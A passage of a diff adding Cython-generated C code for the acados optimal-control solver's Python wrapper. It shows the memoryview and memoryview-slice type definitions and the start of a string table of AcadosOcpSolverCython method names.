#endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_memoryview __pyx_vtable_memoryview; + +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryview_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_memoryview_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_memoryview; + p->obj = Py_None; Py_INCREF(Py_None); + p->_size = Py_None; Py_INCREF(Py_None); + p->_array_interface = Py_None; Py_INCREF(Py_None); + p->view.obj = NULL; + if (unlikely(__pyx_memoryview___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_memoryview(PyObject *o) { + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_memoryview) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryview___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->obj); + Py_CLEAR(p->_size); + Py_CLEAR(p->_array_interface); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_memoryview(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + if (p->obj) { + e = (*v)(p->obj, a); if (e) return e; + } + if (p->_size) { + e = (*v)(p->_size, a); if (e) return e; + } + if (p->_array_interface) { + e = (*v)(p->_array_interface, a); if (e) return e; + } + if (p->view.obj) { + e = (*v)(p->view.obj, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_memoryview(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + tmp = ((PyObject*)p->obj); + p->obj = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_size); + p->_size = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_array_interface); + p->_array_interface = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + Py_CLEAR(p->view.obj); + return 0; +} +static PyObject *__pyx_sq_item_memoryview(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_memoryview(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_memoryview___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_getprop___pyx_memoryview_T(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_base(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_shape(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_strides(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_suboffsets(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_ndim(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_itemsize(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_nbytes(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_size(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(o); +} + +static PyObject *__pyx_specialmethod___pyx_memoryview___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_memoryview___repr__(self); +} + +static PyMethodDef __pyx_methods_memoryview[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_memoryview___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"is_c_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_c_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"is_f_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_f_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy_fortran", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy_fortran, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_memoryview[] = { + {(char *)"T", __pyx_getprop___pyx_memoryview_T, 0, (char *)0, 0}, + {(char *)"base", __pyx_getprop___pyx_memoryview_base, 0, (char *)0, 0}, + {(char *)"shape", __pyx_getprop___pyx_memoryview_shape, 0, (char *)0, 0}, + {(char *)"strides", __pyx_getprop___pyx_memoryview_strides, 0, (char *)0, 0}, + {(char *)"suboffsets", __pyx_getprop___pyx_memoryview_suboffsets, 0, (char *)0, 0}, + {(char *)"ndim", __pyx_getprop___pyx_memoryview_ndim, 0, (char *)0, 0}, + {(char *)"itemsize", __pyx_getprop___pyx_memoryview_itemsize, 0, (char *)0, 0}, + {(char *)"nbytes", __pyx_getprop___pyx_memoryview_nbytes, 0, (char *)0, 0}, + {(char *)"size", __pyx_getprop___pyx_memoryview_size, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_memoryview_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_memoryview}, + {Py_tp_repr, (void *)__pyx_memoryview___repr__}, + {Py_sq_length, (void *)__pyx_memoryview___len__}, + {Py_sq_item, (void *)__pyx_sq_item_memoryview}, + {Py_mp_length, (void *)__pyx_memoryview___len__}, + {Py_mp_subscript, (void *)__pyx_memoryview___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_memoryview}, + {Py_tp_str, (void *)__pyx_memoryview___str__}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_memoryview_getbuffer}, + #endif + {Py_tp_traverse, (void *)__pyx_tp_traverse_memoryview}, + {Py_tp_clear, (void *)__pyx_tp_clear_memoryview}, + {Py_tp_methods, (void *)__pyx_methods_memoryview}, + {Py_tp_getset, (void *)__pyx_getsets_memoryview}, + {Py_tp_new, (void *)__pyx_tp_new_memoryview}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryview_spec = { + "acados_template.acados_ocp_solver_pyx.memoryview", + sizeof(struct __pyx_memoryview_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_memoryview_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_memoryview = { + __pyx_memoryview___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_memoryview, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_memoryview = { + __pyx_memoryview___len__, /*mp_length*/ + __pyx_memoryview___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_memoryview, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_memoryview = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""memoryview", /*tp_name*/ + sizeof(struct __pyx_memoryview_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_memoryview, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_memoryview___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_memoryview, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_memoryview, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + __pyx_memoryview___str__, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_memoryview, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_memoryview, /*tp_traverse*/ + __pyx_tp_clear_memoryview, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_memoryview, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_memoryview, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_memoryview, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct__memoryviewslice __pyx_vtable__memoryviewslice; + +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryviewslice_obj *p; + PyObject *o = __pyx_tp_new_memoryview(t, a, k); + if (unlikely(!o)) return 0; + p = ((struct __pyx_memoryviewslice_obj *)o); + p->__pyx_base.__pyx_vtab = (struct __pyx_vtabstruct_memoryview*)__pyx_vtabptr__memoryviewslice; + p->from_object = Py_None; Py_INCREF(Py_None); + p->from_slice.memview = NULL; + return o; +} + +static void __pyx_tp_dealloc__memoryviewslice(PyObject *o) { + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc__memoryviewslice) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryviewslice___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->from_object); + PyObject_GC_Track(o); + __pyx_tp_dealloc_memoryview(o); +} + +static int __pyx_tp_traverse__memoryviewslice(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + e = __pyx_tp_traverse_memoryview(o, v, a); if (e) return e; + if (p->from_object) { + e = (*v)(p->from_object, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear__memoryviewslice(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + __pyx_tp_clear_memoryview(o); + tmp = ((PyObject*)p->from_object); + p->from_object = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + __PYX_XCLEAR_MEMVIEW(&p->from_slice, 1); + return 0; +} + +static PyMethodDef __pyx_methods__memoryviewslice[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_memoryviewslice_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc__memoryviewslice}, + {Py_tp_doc, (void *)PyDoc_STR("Internal class for passing memoryview slices to Python")}, + {Py_tp_traverse, (void *)__pyx_tp_traverse__memoryviewslice}, + {Py_tp_clear, (void *)__pyx_tp_clear__memoryviewslice}, + {Py_tp_methods, (void *)__pyx_methods__memoryviewslice}, + {Py_tp_new, (void *)__pyx_tp_new__memoryviewslice}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryviewslice_spec = { + "acados_template.acados_ocp_solver_pyx._memoryviewslice", + sizeof(struct __pyx_memoryviewslice_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_memoryviewslice_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_memoryviewslice = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""_memoryviewslice", /*tp_name*/ + sizeof(struct __pyx_memoryviewslice_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc__memoryviewslice, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___repr__, /*tp_repr*/ + #else + 0, /*tp_repr*/ + #endif + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___str__, /*tp_str*/ + #else + 0, /*tp_str*/ + #endif + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + PyDoc_STR("Internal class for passing memoryview slices to Python"), /*tp_doc*/ + __pyx_tp_traverse__memoryviewslice, /*tp_traverse*/ + __pyx_tp_clear__memoryviewslice, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods__memoryviewslice, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new__memoryviewslice, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_u_, __pyx_k_, sizeof(__pyx_k_), 0, 1, 0, 0}, + {&__pyx_n_s_ASCII, __pyx_k_ASCII, sizeof(__pyx_k_ASCII), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython, __pyx_k_AcadosOcpSolverCython, sizeof(__pyx_k_AcadosOcpSolverCython), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_poin, __pyx_k_AcadosOcpSolverCython___get_poin, sizeof(__pyx_k_AcadosOcpSolverCython___get_poin), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_stat, __pyx_k_AcadosOcpSolverCython___get_stat, sizeof(__pyx_k_AcadosOcpSolverCython___get_stat), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_stat_2, __pyx_k_AcadosOcpSolverCython___get_stat_2, sizeof(__pyx_k_AcadosOcpSolverCython___get_stat_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_stat_3, __pyx_k_AcadosOcpSolverCython___get_stat_3, sizeof(__pyx_k_AcadosOcpSolverCython___get_stat_3), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___reduce_c, __pyx_k_AcadosOcpSolverCython___reduce_c, sizeof(__pyx_k_AcadosOcpSolverCython___reduce_c), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___setstate, __pyx_k_AcadosOcpSolverCython___setstate, sizeof(__pyx_k_AcadosOcpSolverCython___setstate), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_poin, __pyx_k_AcadosOcpSolverCython__get_poin, sizeof(__pyx_k_AcadosOcpSolverCython__get_poin), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_stat, __pyx_k_AcadosOcpSolverCython__get_stat, sizeof(__pyx_k_AcadosOcpSolverCython__get_stat), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_stat_2, __pyx_k_AcadosOcpSolverCython__get_stat_2, sizeof(__pyx_k_AcadosOcpSolverCython__get_stat_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_stat_3, __pyx_k_AcadosOcpSolverCython__get_stat_3, sizeof(__pyx_k_AcadosOcpSolverCython__get_stat_3), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_constraint, __pyx_k_AcadosOcpSolverCython_constraint, sizeof(__pyx_k_AcadosOcpSolverCython_constraint), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_constraint_2, __pyx_k_AcadosOcpSolverCython_constraint_2, sizeof(__pyx_k_AcadosOcpSolverCython_constraint_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_cost_set, __pyx_k_AcadosOcpSolverCython_cost_set, sizeof(__pyx_k_AcadosOcpSolverCython_cost_set), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_cost_set_m, __pyx_k_AcadosOcpSolverCython_cost_set_m, sizeof(__pyx_k_AcadosOcpSolverCython_cost_set_m), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_does_not_s, __pyx_k_AcadosOcpSolverCython_does_not_s, sizeof(__pyx_k_AcadosOcpSolverCython_does_not_s), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2, __pyx_k_AcadosOcpSolverCython_does_not_s_2, sizeof(__pyx_k_AcadosOcpSolverCython_does_not_s_2), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_dynamics_g, __pyx_k_AcadosOcpSolverCython_dynamics_g, sizeof(__pyx_k_AcadosOcpSolverCython_dynamics_g), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_eval_param, __pyx_k_AcadosOcpSolverCython_eval_param, sizeof(__pyx_k_AcadosOcpSolverCython_eval_param), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_eval_param_2, __pyx_k_AcadosOcpSolverCython_eval_param_2, sizeof(__pyx_k_AcadosOcpSolverCython_eval_param_2), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_eval_param_3, __pyx_k_AcadosOcpSolverCython_eval_param_3, sizeof(__pyx_k_AcadosOcpSolverCython_eval_param_3), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_get, __pyx_k_AcadosOcpSolverCython_get, sizeof(__pyx_k_AcadosOcpSolverCython_get), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_get_cost, __pyx_k_AcadosOcpSolverCython_get_cost, sizeof(__pyx_k_AcadosOcpSolverCython_get_cost), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_get_field, __pyx_k_AcadosOcpSolverCython_get_field, sizeof(__pyx_k_AcadosOcpSolverCython_get_field), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_get_is_an, __pyx_k_AcadosOcpSolverCython_get_is_an, sizeof(__pyx_k_AcadosOcpSolverCython_get_is_an), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_get_residu, __pyx_k_AcadosOcpSolverCython_get_residu, sizeof(__pyx_k_AcadosOcpSolverCython_get_residu), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_get_stage, __pyx_k_AcadosOcpSolverCython_get_stage, sizeof(__pyx_k_AcadosOcpSolverCython_get_stage), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_get_stats, __pyx_k_AcadosOcpSolverCython_get_stats, sizeof(__pyx_k_AcadosOcpSolverCython_get_stats), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_load_itera, __pyx_k_AcadosOcpSolverCython_load_itera, sizeof(__pyx_k_AcadosOcpSolverCython_load_itera), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_options_se, __pyx_k_AcadosOcpSolverCython_options_se, sizeof(__pyx_k_AcadosOcpSolverCython_options_se), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_options_se_2, __pyx_k_AcadosOcpSolverCython_options_se_2, sizeof(__pyx_k_AcadosOcpSolverCython_options_se_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_print_stat, __pyx_k_AcadosOcpSolverCython_print_stat, sizeof(__pyx_k_AcadosOcpSolverCython_print_stat), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_reset, __pyx_k_AcadosOcpSolverCython_reset, sizeof(__pyx_k_AcadosOcpSolverCython_reset), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_set, __pyx_k_AcadosOcpSolverCython_set, sizeof(__pyx_k_AcadosOcpSolverCython_set), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_set_is_not, __pyx_k_AcadosOcpSolverCython_set_is_not, sizeof(__pyx_k_AcadosOcpSolverCython_set_is_not), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_set_mismat, __pyx_k_AcadosOcpSolverCython_set_mismat, sizeof(__pyx_k_AcadosOcpSolverCython_set_mismat), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_set_new_ti, __pyx_k_AcadosOcpSolverCython_set_new_ti, sizeof(__pyx_k_AcadosOcpSolverCython_set_new_ti), 